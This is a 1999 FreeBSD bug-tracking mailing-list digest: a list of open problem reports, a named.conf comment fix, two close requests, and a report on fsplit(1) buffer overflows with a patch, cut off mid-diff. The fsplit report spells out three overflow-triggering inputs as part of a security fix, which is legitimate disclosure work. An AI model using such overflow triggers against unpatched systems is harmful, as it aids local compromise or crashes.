[1999/11/06] ports/14744 ports tksetathome hangs sysinstall due to lack o [1999/11/06] ports/14745 ports local package fails to install o [1999/11/06] misc/14746 xf86config shell script leaves arrow keys o [1999/11/06] misc/14747 can't install docs 'cause lynx isn't ther o [1999/11/07] ports/14759 ports Many minor port clean-ups o [1999/11/07] ports/14760 asami bsd.port.mk: Speed-up for clean-depends o [1999/11/07] ports/14761 ports More minor port clean-ups o [1999/11/07] ports/14771 ports sslwrap - a new port o [1999/11/07] kern/14778 sio.c doesn't recognize USR model 3090 IS o [1999/11/08] ports/14783 ports mgetty 1.1.12 always sets clocal o [1999/11/08] bin/14786 tail breaks on large files o [1999/11/08] conf/14791 Optionally change the behaviour of fsck u o [1999/11/08] i386/14793 more fdisk partition types o [1999/11/08] misc/14795 Core Dump of /stand/sysinstall o [1999/11/09] ports/14798 ache ports/comms/rzsz no longer compiles becau o [1999/11/09] i386/14800 FreeBSD BootMgr not configurable (or at l o [1999/11/10] conf/14810 [PATCH] initialising multiple interfaces o [1999/11/10] i386/14816 lnc(4) can work with Am79C937 a [1999/11/10] bin/14817 strptime(3) '%C' conversion incorrect o [1999/11/10] ports/14820 torstenb New version of postfix o [1999/11/11] ports/14822 jfitz majordomo sets group-writable dir's o [1999/11/11] ports/14824 wosch no '\0' at the end of buffer o [1999/11/11] bin/14829 rc.shutdown is handled unconsistently by o [1999/11/11] ports/14833 jraynard update port: sfio o [1999/11/11] ports/14838 ache New Speak Freely has been released o [1999/11/12] kern/14839 RELENG_2_2 boot kernel is large size prob o [1999/11/12] kern/14840 Opti930 doesn't work. o [1999/11/12] kern/14841 adrian IEEE 802 encapsulation for arp on etherne o [1999/11/12] bin/14842 PAM's pam_unix.so does not load libcrypt. o [1999/11/12] ports/14854 peter port comms/conserver partially ignores ${ o [1999/11/12] ports/14855 ports [NEW PORT] hns (Hyper NIKKI System) o [1999/11/12] docs/14858 doc pthread_cond_{destroy,timed_wait,wait}.3 f [1999/11/13] ports/14859 ports OpenSSH has no support for the login clas o [1999/11/13] conf/14864 I can not get dual Boot to boot FreeBSD f o [1999/11/13] ports/14866 ports Upgrade FP Exts to FrontPage 2000 Exts. o [1999/11/14] misc/14868 Freebsd 3.2-REL with 1 ISA PNP and 1 PCI o [1999/11/14] ports/14869 ports New FreeBSD port for jesred-1.2.pl1 o [1999/11/14] ports/14870 ports port submission: lc-1.0 f [1999/11/14] misc/14873 grog corrupted file attachments when mail pass o [1999/11/14] ports/14874 ports Eterm 0.8.10 was released o [1999/11/14] ports/14879 ports New port: lang/starlogo o [1999/11/14] ports/14889 ports [PATCH] dynamic loading for WINE port o [1999/11/14] i386/14891 New smbus driver lmsmb o [1999/11/14] ports/14894 ports comm/kermit some fixed patch o [1999/11/15] ports/14904 jmz Update port: graphics/png to 1.0.5 o [1999/11/15] ports/14906 nakai Update devel/glade to 0.5.5 o [1999/11/15] bin/14911 Install of opiekey missing links to otp-m o [1999/11/15] ports/14915 ports Update port: net/generic-nqs o [1999/11/16] ports/14922 ports Want to contribute new package/port o [1999/11/16] ports/14924 markm p5-Apache-Radius with mod_perl broken on o [1999/11/16] bin/14925 getsubopt isn't poisonous enough o [1999/11/16] conf/14931 rc logging facility o [1999/11/16] ports/14933 imp Simple patch to log password attempts on o [1999/11/16] docs/14936 doc Update for chpass.1 man page o [1999/11/17] ports/14945 ports [NEW PORT] gtkdiff - the diff(1) front-en o [1999/11/17] docs/14952 doc Missing man page (terminfo(5)) mentioned o [1999/11/17] bin/14954 search.h is missing o [1999/11/17] ports/14956 ports new port: www/screem o [1999/11/17] ports/14957 ports gtk12 requires Cronyx fonts for Russian l o [1999/11/17] ports/14963 ports update for current sox port to include GS o [1999/11/17] ports/14965 wosch stat port doesn't know fifo file type o [1999/11/17] kern/14968 Convert resource_head and resource.r_link o [1999/11/17] ports/14970 peter conserver-7.4 port submission o [1999/11/17] ports/14971 ports mkcmd-8.10 port submission o [1999/11/17] ports/14972 ports msrc0-0.6 port submission o [1999/11/18] conf/14973 Digi-multiport serial card? o [1999/11/18] conf/14974 In RELENG_3, fdisk reports sizes incorrec o [1999/11/18] ports/14977 peter conserver doesn't support speed over than f [1999/11/18] ports/14983 green OpenSSH, support for login.conf o [1999/11/18] ports/14986 ports possible bug in ssh1 o [1999/11/18] kern/14990 cg new-pcm caveats o [1999/11/18] ports/14991 ports Tcl Data transformations (Tcl-Trf) port o [1999/11/19] misc/14993 Freebsd Locks up when trying to set the h o [1999/11/19] ports/14994 ports [ports upgrade] chinese/pine4 from 4.20 t o [1999/11/19] misc/14999 ISO8859-5 locale missing from RELENG_3 o [1999/11/19] misc/15000 ftp(1) needs to send HTTP/1.1 Host: heade o [1999/11/20] docs/15004 doc isdnd.rc.5 typo (changing -> charging, an o [1999/11/20] ports/15008 jfieber textproc/jade port broken under -current o [1999/11/20] conf/15010 "client" firewall configuration kills inc o [1999/11/21] ports/15016 ports New Port: lang/yabasic o [1999/11/21] ports/15021 ports some port installs fail for non-root user o [1999/11/21] kern/15022 mjacob Suggestion for enhancement: move isp firm o [1999/11/21] ports/15024 ports new port: sysutils/detach o [1999/11/21] ports/15027 ports libmcrypt's distfiles should be updated o [1999/11/21] ports/15030 ports New patch, i3dren o [1999/11/21] ports/15031 ports new port editors/auctex o [1999/11/21] ports/15034 andreas update postgresql port to 6.5.3 o [1999/11/21] ports/15035 jseger [Tcl/Tk] apply plus patch to Tcl/Tk8.2 o [1999/11/21] docs/15036 doc update of queue manpage o [1999/11/21] conf/15038 In sysinstall, easy to not notice that se o [1999/11/22] ports/15042 kris linux-realplayer gives wrong information o [1999/11/22] bin/15048 tcopy reports incorrect values o [1999/11/22] bin/15056 gethostbyname complains about SIG RR:s o [1999/11/23] ports/15064 ports New port submittal o [1999/11/23] kern/15065 fsck can't fix "huge" zero length files o [1999/11/23] misc/15066 ``allscreens_flags'' in rc.conf not docum o [1999/11/25] gnu/15091 add -I option to gnu groff and gnu soelim o [1999/11/25] ports/15093 ports ass man pages to net/dnsutl o [1999/11/25] ports/15094 ports Updated port to ftp/downloader to version o [1999/11/25] kern/15095 TCP's advertised window is not scaled imm o [1999/11/26] ports/15102 ports pgp5 port is broken under -CURRENT o [1999/11/26] ports/15108 ports The print/latex port is thrashing the dis o [1999/11/27] ports/15118 ports wine-991114 once more o [1999/11/27] i386/15119 pcm sound driver dma problems with isa-pn o [1999/11/27] ports/15124 ports Update port: security/portsentry o [1999/11/27] ports/15126 ports New port: databases/pxtools o [1999/11/27] misc/15127 _T is defined in ctype.h and breaks c++ l o [1999/11/27] ports/15128 dirk Php4 beta 3 o [1999/11/27] ports/15130 ports update port: www/hypermail o [1999/11/28] ports/15131 ports new port: devel/kpp o [1999/11/28] ports/15134 ports new port: www/kdreamsite o [1999/11/28] ports/15135 ports new port: devel/cervisia o [1999/11/28] ports/15138 ports New port: deskutils/yank o [1999/11/28] ports/15141 ports update games/gracer to 0.1.4 o [1999/11/28] ports/15142 ports Added DIST_SUBDIR to print/tex port o [1999/11/28] ports/15143 ports update to freetds port (new release) o [1999/11/28] ports/15144 ports New port for hevea o [1999/11/28] ports/15146 ports New port submition emulator/truereality, o [1999/11/28] ports/15147 ports New port: audio/xsidplay o [1999/11/28] ports/15148 ports Update port: graphics/gimp1-i18n o [1999/11/28] ports/15152 ports new port cd-console o [1999/11/28] ports/15154 ports update the p5-SQL-Statement port to versi o [1999/11/28] ports/15155 ports update of p5-ReadLine-Perl to version 0.9 o [1999/11/28] ports/15156 ports update of p5-URI to version 1.04 o [1999/11/28] ports/15159 ports new port: games/blackpenguin o [1999/11/28] ports/15160 ports new port: games/ksnes9x o [1999/11/29] ports/15166 ports update udmsearch port to 2.2.1 o [1999/11/29] misc/15168 Adding tracklist support to fdformat o [1999/11/29] ports/15170 ports Update Port: leafnode+ o [1999/11/29] ports/15173 ports Update Etherboot 4.2.11 o [1999/11/29] kern/15175 tcp_input() fails to update m->m_pkthdr.l o [1999/11/29] ports/15176 ports Update port: databases/p5-Mysql o [1999/11/30] ports/15180 ports New audio port submission: soundtracker o [1999/11/30] bin/15182 "* Wed-1 event" in calendar produces "31 o [1999/11/30] ports/15188 ports [PATCH] ports/mail/p5-IMAP-Admin upgrade o [1999/11/30] ports/15192 ports Ident2 Daemon o [1999/11/30] misc/15196 shutdown -h no longer synching disks, thu o [1999/12/01] ports/15203 ports New FreeBSD port: p5-Term-ANSIColor o [1999/12/01] misc/15205 Addition to /usr/games/random o [1999/12/01] ports/15209 ports BitchX 1.0 IRC client port o [1999/12/01] bin/15211 CFLAGS and CC not settable and one warnin o [1999/12/01] misc/15215 Outputting in Fortune under certain circu o [1999/12/02] i386/15218 kernel says: raw partition size != slice o [1999/12/02] kern/15221 Linux emulator core dumps on setreuid() o [1999/12/02] ports/15223 ports Update port: audio/mpeg-lib o [1999/12/02] ports/15226 ports Update port: misc/amanda o [1999/12/02] bin/15227 sheldonh New option for vacation(1) -- dir to use o [1999/12/02] bin/15229 joe mtree - different from mtree in NetBSD 1. o [1999/12/02] docs/15234 doc sh(1) man page have capitalised instance o [1999/12/03] ports/15237 ports update: ports/misc/fd (followup source di o [1999/12/03] ports/15239 asami fix MASTER_SITE_GNOME in bsd.port.mk: mi o [1999/12/03] ports/15240 ports [PATCH] update xfce port to the 3.2.1 ver o [1999/12/03] ports/15242 ports Update port: japanese/grep o [1999/12/03] ports/15244 ports Update port: japanese/gxditview o [1999/12/03] ports/15246 ports New port: irc/gtk-bitchx o [1999/12/03] ports/15250 ports MC fail to show contents of ZIP archives o [1999/12/04] kern/15251 patch to add unsigned support to sysctl o [1999/12/04] ports/15252 ports small fix to remove setuid proposal + mas o [1999/12/04] ports/15253 ports update nqc port to 2.0.2 o [1999/12/04] ports/15258 ports New port: misc/party o [1999/12/04] docs/15259 doc amd(8) refers to nonexistent automount(8) o [1999/12/04] ports/15260 ports New port: games/cursive o [1999/12/04] ports/15261 ports Update port: graphics/kplot3d o [1999/12/04] ports/15263 ports [PATCH] Updates for devel/freelibiberty o [1999/12/04] ports/15264 ports New port: sysutils/orville-write o [1999/12/04] ports/15266 ports UPDATE: ports/www/tidy to Nov 30 version s [1999/12/04] bin/15267 joe CHANGE-REQUEST: WHOIS(1) - Support Intern o [1999/12/05] kern/15280 kernel panic during FreeBSD install o [1999/12/05] ports/15282 ports unfetchable MASTER_SITES change: archiver o [1999/12/05] ports/15284 ache error installing bash2 from ports on 3.3- o [1999/12/05] bin/15285 unhelpful error message from brandelf o [1999/12/05] misc/15288 billf pkg_version -c output isn't safe for scri o [1999/12/05] ports/15294 jfitz Update port: mrgt from 2.8.8 to 2.8.9 o [1999/12/05] ports/15295 ports Update port: rrdtool from version 1.0.7 t o [1999/12/05] kern/15299 One more videocard (NVidia Vanta) o [1999/12/06] docs/15300 doc assorted update for FAQ o [1999/12/06] bin/15301 Bug in /usr/sbin/syslogd: strips 8th bits o [1999/12/06] misc/15304 billf proposed modifications to pkg_version o [1999/12/06] ports/15307 ports Port for pstotext o [1999/12/06] ports/15313 ports Persuade graphics/gd to build shared libr o [1999/12/06] ports/15315 ports Xfstt may thrash the drive. o [1999/12/06] ports/15316 ports Can not install ssh2 o [1999/12/06] bin/15318 ifconfig dumps core o [1999/12/06] ports/15319 ports Mailcrypt upgrade from 3.4 to 3.5.5 o [1999/12/06] ports/15320 ports Update port: graphics/gtkgraph s [1999/12/06] ports/15321 cpiazza Update port: textproc/freegrep o [1999/12/06] ports/15322 ports Update port: textproc/code2html o [1999/12/06] ports/15324 ports Update port: graphics/enfle o [1999/12/06] bin/15325 mpp nroff -man bombs out with more than eight o [1999/12/06] ports/15326 ports tcsh modification o [1999/12/07] ports/15329 ports amanda24 modification o [1999/12/07] ports/15330 ports editor joe modification o [1999/12/07] ports/15333 ports Update port: archivers/lzo o [1999/12/07] ports/15334 ports Update port: audio/gsm o [1999/12/07] ports/15335 ports Update port: graphics/dore o [1999/12/07] ports/15336 ports Update port: graphics/epstool o [1999/12/07] ports/15338 ports New port: graphics/pngcrush o [1999/12/07] misc/15339 fdformat should exit non-zero when user c o [1999/12/07] ports/15341 ports XF86Setup in CURRENT is broken on possibl o [1999/12/07] bin/15342 replacement for the stock /sbin/dhclient- o [1999/12/07] ports/15343 ports Port update: net/icqlib o [1999/12/07] ports/15344 ports Port update: net/kicq o [1999/12/07] ports/15347 ports [New Ports] Xatm o [1999/12/08] ports/15354 ports Update port: security/portsentry o [1999/12/08] ports/15355 ports [PATCH] New version 2.4 of WmakerConf (x1 o [1999/12/08] ports/15359 ports Update port: russian/apache13 o [1999/12/08] ports/15360 ports new port = logcheck o [1999/12/08] ports/15362 obrien mutt core dumps as soon as a key is press o [1999/12/08] ports/15366 ports Update: japanese/libslang o [1999/12/08] ports/15367 ports new ports on linux emulator o [1999/12/09] bin/15370 markm bug in sort o [1999/12/09] bin/15371 keyinfo doesn't work without suidperl o [1999/12/09] ports/15372 ports ja-platex2e ports are too obsolete o [1999/12/09] ports/15375 ports Update port: editors/bvi o [1999/12/09] ports/15378 ports Update port: audio/maplay o [1999/12/09] ports/15387 ports ethereal's packet-smb.c calls str*() func o [1999/12/09] bin/15390 obrien Upgrade rdist to 6.1.5 o [1999/12/10] ports/15394 ports new port: japanese/kanji18, kanji26, ngra o [1999/12/10] ports/15397 ports port lang/elk: CC not settable. o [1999/12/10] ports/15401 ports Update ports: XEmacs-21.1.8 o [1999/12/10] ports/15402 ports Update port: games/xshisen o [1999/12/10] ports/15407 ports New Port: graphics/chbg o [1999/12/10] docs/15408 doc Description of ls and nlist wrong in man o [1999/12/10] ports/15409 ports [PATCH] net/tik shell script to launch `` o [1999/12/10] bin/15410 edquota -p copies current usage as well a o [1999/12/10] misc/15411 anoncvs does not work: /ctm/FreeBSD/anonc o [1999/12/10] ports/15412 wes new port: shells/perlsh o [1999/12/10] ports/15413 wes new port: shells/flash o [1999/12/11] pending/15415gnats-adminport games/xqf: update to 0.9.1 o [1999/12/11] bin/15416 addr2line is unable to find line numbers o [1999/12/11] bin/15418 tput(1) doesn't work with new libncurses. o [1999/12/11] misc/15421 initgroups(3) spits out messages to stder o [1999/12/11] conf/15422 wpaul /boot/defaults/loader.conf references old o [1999/12/11] ports/15423 ports update mail/nmh port to nmh-1.0.2 o [1999/12/11] ports/15424 ports new port: www/kwebsearch o [1999/12/11] kern/15425 statfs and fstatfs syscall in linux emula o [1999/12/11] ports/15428 ports update port: astro/xearth 1.0 -> 1.1 o [1999/12/11] docs/15429 doc Jewish calendar is out of date o [1999/12/11] ports/15430 jmz xloadimage tiles only verticaly if -tile o [1999/12/11] ports/15431 ports New port: games/baduki o [1999/12/11] ports/15432 ports fix devel/t1lib packaging error o [1999/12/11] ports/15433 ports Small update to flexbackup port. Maintain o [1999/12/12] ports/15434 ports new port: devel/kdevelop o [1999/12/12] kern/15435 Attempts to execute programs from a noexe o [1999/12/12] kern/15436 syscons extension: "propellers" o [1999/12/12] docs/15439 billf Add update target to doc/Makefile o [1999/12/12] kern/15440 support atomic locks in the UP kernel o [1999/12/12] docs/15441 wosch man.cgi does not properly handle man.cgi? o [1999/12/12] ports/15443 ports Updated port: devel/t1lib from 0.9.2 to 1 o [1999/12/12] ports/15444 ports Updated port: graphics/xpdf due to pendin o [1999/12/12] kern/15448 Would be nice if the kernel could detect/ o [1999/12/12] pending/15449gnats-adminchecking for signal handlers reset automa o [1999/12/12] ports/15453 ports Update FreeTDS from 0.47pre2 to 0.50 o [1999/12/12] ports/15454 ports Error in lame-3.51 Makefile o [1999/12/12] kern/15455 Intel EtherExpress Pro does not properly o [1999/12/13] bin/15456 Usage of ktrace(1) is invalid o [1999/12/13] bin/15458 sort(1) doesn't sort correctly in some ca o [1999/12/13] ports/15459 ports news/cnews for for gawk o [1999/12/13] ports/15461 ports Update of misc/xdelta port o [1999/12/13] ports/15462 ports New port: cad/cider 1438 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 12:30: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F415151E7 for ; Mon, 13 Dec 1999 12:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA20973; Mon, 13 Dec 1999 12:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from public.ndh.com (public.ndh.net [194.97.97.21]) by hub.freebsd.org (Postfix) with ESMTP id D0159151E7 for ; Mon, 13 Dec 1999 12:22:01 -0800 (PST) (envelope-from s.moeding@ndh.net) Received: from elan.sfx.ddns.org (port2051.duesseldorf.ndh.net [195.227.37.51]) by public.ndh.com (8.8.7/8.8.0) with ESMTP id VAA26836 for ; Mon, 13 Dec 1999 21:21:42 +0100 (MET) Received: (from sm@localhost) by esprit.sfx.ddns.org (8.9.3/8.9.3) id VAA18615; Mon, 13 Dec 1999 21:20:38 +0100 (CET) (envelope-from sm@sfx.ddns.org) Message-Id: <199912132020.VAA18615@esprit.sfx.ddns.org> Date: Mon, 13 Dec 1999 21:20:38 +0100 (CET) From: s.moeding@ndh.net Reply-To: s.moeding@ndh.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15470: Proposed change to comments in /etc/namedb/named.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15470 >Category: bin >Synopsis: Proposed change to comments in /etc/namedb/named.conf >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 12:30:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Stefan Moeding >Release: FreeBSD 3.4-RC i386 >Organization: Private FreeBSD site >Environment: FreeBSD 3.3-STABLE and FreeBSD 3.4-RC >Description: In my opinion the description of the 'forwarders' keyword in /etc/namedb/named.conf might convince some people to keep the address 127.0.0.1 configured. This doesn't make any sense, since BIND will use those hosts to resolve locally unknown names and localhost obviously doesn't know the answer. I propose the following change to the description. It also replaces 127.0.0.1 with a value which should cause fewer `mysterious' problems. Stefan >How-To-Repeat: >Fix: --- named.conf.orig Mon Dec 13 20:40:48 1999 +++ named.conf Mon Dec 13 20:52:23 1999 @@ -15,12 +15,17 @@ // // forward only; -// If you've got a DNS server around at your upstream provider, enter -// its IP address here, and enable the line below. This will make you -// benefit from its cache, thus reduce overall DNS traffic in the Internet. +// If you've got one or more DNS servers around at your upstream provider, +// enter their IP addresses here, and enable the lines below. This will +// make you benefit from their caches, thus reduce overall DNS traffic in +// the Internet. +// +// NB: Do not use the IP addresses below, they are faked, and only +// serve demonstration/documentation purposes! /* forwarders { - 127.0.0.1; + 10.1.1.1; + 10.2.2.2; }; */ /* >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 13: 0: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6DF8915190 for ; Mon, 13 Dec 1999 13:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA25133; Mon, 13 Dec 1999 13:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 13:00:01 -0800 (PST) Message-Id: <199912132100.NAA25133@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Johan Karlsson Subject: Re: conf/12984: /etc/rc* does not contain any support for dhclient Reply-To: Johan Karlsson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/12984; it has been noted by GNATS. From: Johan Karlsson To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: conf/12984: /etc/rc* does not contain any support for dhclient Date: Mon, 13 Dec 1999 21:50:15 +0100 Please close this PR since a similar patch has been commited to both current and stable. /K -- Johan Karlsson mailto:k@numeri.campus.luth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 13: 0: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A9578151E4 for ; Mon, 13 Dec 1999 13:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA25147; Mon, 13 Dec 1999 13:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 13 Dec 1999 13:00:03 -0800 (PST) Message-Id: <199912132100.NAA25147@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Johan Karlsson Subject: Re: kern/13752: "tl0: adapter check: 180005" mesages keep coming up from kernel Reply-To: Johan Karlsson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13752; it has been noted by GNATS. From: Johan Karlsson To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/13752: "tl0: adapter check: 180005" mesages keep coming up from kernel Date: Mon, 13 Dec 1999 21:53:38 +0100 Please close this PR. Duplicate of kern/13757 which has a follow-ups. /K -- Johan Karlsson mailto:k@numeri.campus.luth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 13 13: 0:19 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C49C9151BE for ; Mon, 13 Dec 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA25142; Mon, 13 Dec 1999 13:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from troutmask.apl.washington.edu (troutmask.apl.washington.edu [128.95.76.54]) by hub.freebsd.org (Postfix) with ESMTP id 994FF15266 for ; Mon, 13 Dec 1999 12:51:09 -0800 (PST) (envelope-from kargl@troutmask.apl.washington.edu) Received: (from kargl@localhost) by troutmask.apl.washington.edu (8.9.3/8.9.3) id MAA89742; Mon, 13 Dec 1999 12:50:24 -0800 (PST) (envelope-from kargl) Message-Id: <199912132050.MAA89742@troutmask.apl.washington.edu> Date: Mon, 13 Dec 1999 12:50:24 -0800 (PST) From: "Steven G. Kargl" Reply-To: kargl@troutmask.apl.washington.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15471: fsplit buffer overflow fixes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15471 >Category: bin >Synopsis: Fix several buffer overflows >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 13:00:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Steven G. Kargl >Release: FreeBSD 4.0-CURRENT i386 >Organization: apl/uw >Environment: All version of FreeBSD. >Description: fsplit(1) has several buffer overflow problems. These overflows could be exploited by a user on a system to cause problems (either to breach security or panic a system). >How-To-Repeat: There are at least three ways to over flow buffers: 1. fsplit -e arg1 ... -e arg100 -e START_OF_OVERFLOW prog.f 2. fsplit -e arg_containing_more_1000_chars prog.f 3. fsplit prog.f where prog.f contains a Fortran subprogram with a name containing more than 20 chars: program ThisNameIsTooLongForTheBuffer end >Fix: The attached patch does: * Remove the custom command line parser. Use getopt(3), instead. Fixes 1 and 2 above. * Use dynamic memory allocation to remove static buffers. Fixes 1 and 2 above. * Keep track of characters copied from subprogram names in scan_name(). Fixes 3 above. * Give fsplit a "return 0;" statement * Include to properly prototype exit(3). * Whitespace clean up * Update man page. fsplit(1) works with Fortran 77 and older code. diff -u -r /usr/src/usr.bin/fsplit/fsplit.1 fsplit/fsplit.1 --- /usr/src/usr.bin/fsplit/fsplit.1 Mon Aug 30 08:00:49 1999 +++ fsplit/fsplit.1 Mon Dec 13 12:25:49 1999 @@ -39,7 +39,7 @@ .Os BSD 4.2 .Sh NAME .Nm fsplit -.Nd split a multi-routine Fortran file into individual files +.Nd split a multi-routine Fortran 77 file into individual files .Sh SYNOPSIS .Nm fsplit .Op Fl e Ar efile @@ -47,8 +47,8 @@ .Op Ar file .Sh DESCRIPTION .Nm Fsplit -takes as input either a file or standard input containing Fortran source code. -It attempts to split the input into separate routine files of the +takes as input either a file or standard input containing Fortran 77 source +code. It attempts to split the input into separate routine files of the form .Ar name.f , where @@ -104,3 +104,7 @@ .Fl e for unnamed main programs and block data subprograms since you must predict the created file name. +.Pp +.Nm +can be used with Fortran 77 and older source code. It understands neither +Fortran 90/95 syntax nor free form source files. diff -u -r /usr/src/usr.bin/fsplit/fsplit.c fsplit/fsplit.c --- /usr/src/usr.bin/fsplit/fsplit.c Tue Sep 7 11:59:34 1999 +++ fsplit/fsplit.c Mon Dec 13 12:14:36 1999 @@ -51,6 +51,7 @@ #include #include #include +#include #include #include #include @@ -90,11 +91,9 @@ #define TRUE 1 #define FALSE 0 -int extr = FALSE, - extrknt = -1, - extrfnd[100]; -char extrbuf[1000], - *extrnames[100]; + +int extr = FALSE, extrknt = -1, *extrfnd; +char **extrnames; struct stat sbuf; #define trim(p) while (*p == ' ' || *p == '\t') p++ @@ -103,101 +102,119 @@ void get_name __P((char *, int)); char *functs __P((char *)); int lend __P((void)); -int lname __P((char *)); +int lname __P((char *, int)); char *look __P((char *, char *)); int saveit __P((char *)); -int scan_name __P((char *, char *)); +int scan_name __P((char *, char *, int)); char *skiplab __P((char *)); static void usage __P((void)); int main(argc, argv) +int argc; char **argv; { + extern int optind; + extern char *optarg; + register FILE *ofp; /* output file */ register int rv; /* 1 if got card in output file, 0 otherwise */ register char *ptr; int nflag, /* 1 if got name of subprog., 0 otherwise */ retval, i; - char name[20], - *extrptr = extrbuf; + char name[20]; - /* scan -e options */ - while ( argc > 1 && argv[1][0] == '-' && argv[1][1] == 'e') { + if (argc > 2) { extr = TRUE; - ptr = argv[1] + 2; - if(!*ptr) { - argc--; - argv++; - if(argc <= 1) + + extrfnd = (int *) malloc(argc * sizeof(int)); + if (extrfnd == NULL) + errx(1, NULL); + + extrnames = (char **) malloc(argc * sizeof(char *)); + if (extrnames == NULL) + errx(1, NULL); + + while ((i = getopt(argc, argv, "e:")) != -1) { + switch (i) { + case 'e': + extrknt++; + extrfnd[extrknt] = FALSE; + extrnames[extrknt] = optarg; + break; + default: usage(); - ptr = argv[1]; + } } - extrknt = extrknt + 1; - extrnames[extrknt] = extrptr; - extrfnd[extrknt] = FALSE; - while(*ptr) *extrptr++ = *ptr++; - *extrptr++ = 0; + + argc -= optind; + argv += optind; + } else { argc--; argv++; } - if (argc > 2) + if (argc > 1) usage(); - else if (argc == 2) { - if ((ifp = fopen(argv[1], "r")) == NULL) + else if (argc == 1) { + if ((ifp = fopen(*argv, "r")) == NULL) errx(1, "cannot open %s", argv[1]); } else ifp = stdin; - for(;;) { - /* look for a temp file that doesn't correspond to an existing file */ - get_name(x, 3); - ofp = fopen(x, "w"); - nflag = 0; - rv = 0; - while (getline() > 0) { - rv = 1; - fprintf(ofp, "%s", buf); - if (lend()) /* look for an 'end' statement */ - break; - if (nflag == 0) /* if no name yet, try and find one */ - nflag = lname(name); - } - fclose(ofp); - if (rv == 0) { /* no lines in file, forget the file */ - unlink(x); - retval = 0; - for ( i = 0; i <= extrknt; i++ ) - if(!extrfnd[i]) { - retval = 1; - warnx("%s not found", extrnames[i]); - } - exit( retval ); - } - if (nflag) { /* rename the file */ - if(saveit(name)) { - if (stat(name, &sbuf) < 0 ) { - link(x, name); - unlink(x); - printf("%s\n", name); + + for (;;) { + /* look for a temp file that doesn't correspond to an existing file */ + get_name(x, 3); + ofp = fopen(x, "w"); + if (ofp == NULL) + errx(1, "can not open %s", x); + nflag = 0; + rv = 0; + while (getline() > 0) { + rv = 1; + fprintf(ofp, "%s", buf); + if (lend()) /* look for an 'end' statement */ + break; + if (nflag == 0) /* if no name yet, try and find one */ + nflag = lname(name, 20); + } + fclose(ofp); + if (rv == 0) { /* no lines in file, forget the file */ + unlink(x); + retval = 0; + for ( i = 0; i <= extrknt; i++ ) + if(!extrfnd[i]) { + retval = 1; + warnx("%s not found", extrnames[i]); + } + exit( retval ); + } + if (nflag) { /* rename the file */ + if(saveit(name)) { + if (stat(name, &sbuf) < 0 ) { + link(x, name); + unlink(x); + printf("%s\n", name); + continue; + } else if (strcmp(name, x) == 0) { + printf("%s\n", x); + continue; + } + printf("%s already exists, put in %s\n", name, x); continue; - } else if (strcmp(name, x) == 0) { - printf("%s\n", x); + } else + unlink(x); continue; - } - printf("%s already exists, put in %s\n", name, x); - continue; - } else + } + if (!extr) + printf("%s\n", x); + else unlink(x); - continue; - } - if(!extr) - printf("%s\n", x); - else - unlink(x); - } + } + + return 0; } static void @@ -241,7 +258,7 @@ break; *ptr = '0'; } - if(ptr < name + letters) + if (ptr < name + letters) errx(1, "ran out of file names"); } } @@ -293,18 +310,19 @@ name and put in arg string. invent name for unnamed block datas and main programs. */ int -lname(s) +lname(s, len) char *s; +int len; { # define LINESIZE 80 register char *ptr, *p; char line[LINESIZE], 